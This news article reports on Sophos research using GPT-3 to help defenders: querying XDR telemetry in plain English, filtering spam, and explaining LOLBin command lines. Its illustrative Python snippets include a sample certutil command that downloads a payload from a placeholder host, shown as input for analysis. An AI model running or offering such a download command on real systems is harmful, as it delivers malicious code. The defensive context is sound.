Sophos explores using ChatGPT to tackle cyberthreats


By Dylan Bushell-Embling
Wednesday, 22 March, 2023

Cybersecurity company Sophos has released new research demonstrating how the generative AI technology behind ChatGPT can be used to fight cybercrime.

The research details pilot projects developed using the GPT-3 family of large language models to simplify the search for malicious activity in data from security software, more accurately filter spam, and speed up analysis of “living off the land” attacks.

For example, Sophos found the GPT-3 model can be used to filter for malicious activity in XDR telemetry datasets. The company tested the approach against its endpoint detection and response product, allowing defenders to filter the data using plain-English queries.
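As a rough illustration of the idea (not Sophos’s actual implementation), the sketch below uses the OpenAI Python client to turn an analyst’s plain-English question into an SQL query over a hypothetical telemetry table. The table schema, column names and model choice are assumptions made for the example.

```python
# Hypothetical sketch: translating a plain-English hunting question into an
# SQL filter over an XDR-style telemetry table using a large language model.
# The table name, columns and model are illustrative, not Sophos's schema.
from openai import OpenAI

client = OpenAI()  # reads OPENAI_API_KEY from the environment

SCHEMA = (
    "Table process_events(timestamp TEXT, hostname TEXT, username TEXT, "
    "process_name TEXT, cmdline TEXT, parent_name TEXT)"
)

def english_to_sql(question: str) -> str:
    """Ask the model to turn an analyst's question into a single SQL query."""
    prompt = (
        f"You write SQL for a security telemetry database.\n{SCHEMA}\n"
        f"Return only one SQL SELECT statement answering: {question}"
    )
    resp = client.chat.completions.create(
        model="gpt-3.5-turbo",  # stand-in for the GPT-3 models used in the research
        messages=[{"role": "user", "content": prompt}],
        temperature=0,  # deterministic output for repeatable queries
    )
    return resp.choices[0].message.content.strip()

if __name__ == "__main__":
    print(english_to_sql("Show PowerShell processes launched by Office apps in the last 24 hours"))
```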

Sophos researchers were also able to adapt the technology to simplify the notoriously difficult process of reverse-engineering the command lines of living off the land binaries, known as LOLBins.
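The same pattern can be sketched for LOLBin triage: the hypothetical example below asks a model to explain, step by step, what a suspicious command line does. The command line, prompt wording and model name are illustrative assumptions, not Sophos’s published tooling.

```python
# Hypothetical sketch: asking a large language model to explain a suspicious
# "living off the land" (LOLBin) command line in plain English.
from openai import OpenAI

client = OpenAI()

def explain_lolbin(cmdline: str) -> str:
    """Return a plain-English explanation of what a command line likely does."""
    resp = client.chat.completions.create(
        model="gpt-3.5-turbo",  # illustrative model choice
        messages=[{
            "role": "user",
            "content": (
                "You are a malware analyst. Explain step by step what this "
                f"command line does and whether it looks malicious:\n{cmdline}"
            ),
        }],
        temperature=0,
    )
    return resp.choices[0].message.content

# Example: certutil abused as a downloader, a classic LOLBin technique.
print(explain_lolbin(
    "certutil.exe -urlcache -split -f http://example.com/payload.bin C:\\Users\\Public\\p.bin"
))
```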

Sophos Principal Threat Researcher Sean Gallagher said the research demonstrates that generative AI can be used by both sides of the security fence.

“Since OpenAI unveiled ChatGPT back in November, the security community has largely focused on the potential risks this new technology could bring,” he said.

“Can the AI help wannabe attackers write malware or help cybercriminals write much more convincing phishing emails? Perhaps, but, at Sophos, we’ve long seen AI as an ally rather than an enemy for defenders, making it a cornerstone technology for Sophos, and GPT-3 is no different.”

He said the findings demonstrate that the security community should be paying attention not just to the potential risks, but the potential opportunities GPT-3 brings.

“We are already working on incorporating some of the prototypes above into our products, and we’ve made the results of our efforts available on our GitHub for those interested in testing GPT-3 in their own analysis environments,” Gallagher said.

“In the future, we believe that GPT-3 may very well become a standard co-pilot for security experts.”

Image credit: iStock.com/marchmeena29
